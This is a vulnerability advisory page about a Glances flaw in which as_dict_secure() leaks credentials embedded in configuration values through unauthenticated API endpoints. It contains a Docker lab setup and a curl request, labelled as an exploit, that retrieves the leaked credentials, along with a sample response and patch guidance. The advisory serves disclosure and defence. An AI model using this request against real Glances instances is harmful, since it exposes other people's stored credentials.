Glances, Information Disclosure via as_dict_secure() Value-Level Bypass, CVE-2026-68520 -DC-Aug2026-1544

Listen to this Post

The vulnerability exists in Glances’ `as_dict_secure()` function, located in glances/config.py. This function was explicitly designed to provide a sanitised copy of the configuration dictionary for unauthenticated API access. Its docstring states it returns a copy where “Sensitive keys in remaining sections are replaced by ””. However, the implementation only checks option names against a regular expression pattern for terms like “password”, “token”, or “secret”. It never inspects the actual values of configuration options.
The core issue arises in the `

` configuration section, which supports `public_api` (a URL), `public_username` (a login), and `public_password` (a password). While `public_password` is correctly masked because its name matches the regex, both `public_username` and a `public_api` URL containing embedded credentials (e.g., <code>https://user:pass@host/`) are returned in full. This happens because their names do not match the sensitive key pattern. The flaw is triggered when Glances is run in web server mode without the `--password` flag (default, no authentication). An unauthenticated attacker can then retrieve these credentials by sending a GET request to `/api/4/config` or</code>/api/4/config/ip<code>. This represents a failure of `as_dict_secure()` to fulfill its documented purpose of protecting credentials in no-auth mode. The issue is fixed in Glances version 4.5.6.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Glances
Version: < 4.5.6
Vulnerability: Credential Disclosure
Severity: Moderate
date: 2026-07-28
<h2 style="color: blue;">Prediction: 2026-08-17</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Check Glances version
glances --version
Run Glances in web server mode (no auth)
docker run -d --name glances-test -p 8080:61208 -e GLANCES_OPT='-w' nicolargo/glances:latest
Wait for the service to start
sleep 20
Modify the configuration to include vulnerable values
docker exec glances-test sed -i 's|public_api=https://ipv4.ipleak.net/json/|public_api=https://admin:[email protected]/json/|' /etc/glances/glances.conf
docker exec glances-test sed -i 's|public_username=<myname>|public_username=myname|' /etc/glances/glances.conf
docker exec glances-test sed -i 's|public_password=<mysecret>|public_password=mysecret|' /etc/glances/glances.conf
Restart the container to apply changes
docker restart glances-test
sleep 15
Exploit: Retrieve the leaked credentials
curl -s "http://<target-ip>:8080/api/4/config/ip"

<h2 style=”color: blue;”>Exploit: (Educational Purposes!)</h2>
An unauthenticated attacker can directly access the vulnerable API endpoint. The following `curl` command demonstrates the exploit against a vulnerable instance:

curl -s "http://<target-ip>:8080/api/4/config/ip"

A successful exploit will return a JSON response similar to the following, exposing the `public_api` URL with embedded credentials and thepublic_username:

{"public_api": "https://admin:[email protected]/json/", "public_username": "myname", "public_password": ""}

<h2 style="color: blue;">Protection:</h2>
The primary and recommended protection is to upgrade Glances to version 4.5.6 or later. If an immediate upgrade is not possible, as a temporary workaround, the `/api/4/config` and `/api/4/config/ip` endpoints should be disabled or restricted to authenticated users only.
<h2 style="color: blue;">Impact:</h2>
This vulnerability allows an unauthenticated attacker to retrieve sensitive information, including usernames and plaintext credentials. The exposed credentials could be used to gain unauthorized access to the configured backend services, such as the monitoring API endpoint defined in
public_api`. This compromises the confidentiality of the system and its connected services.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top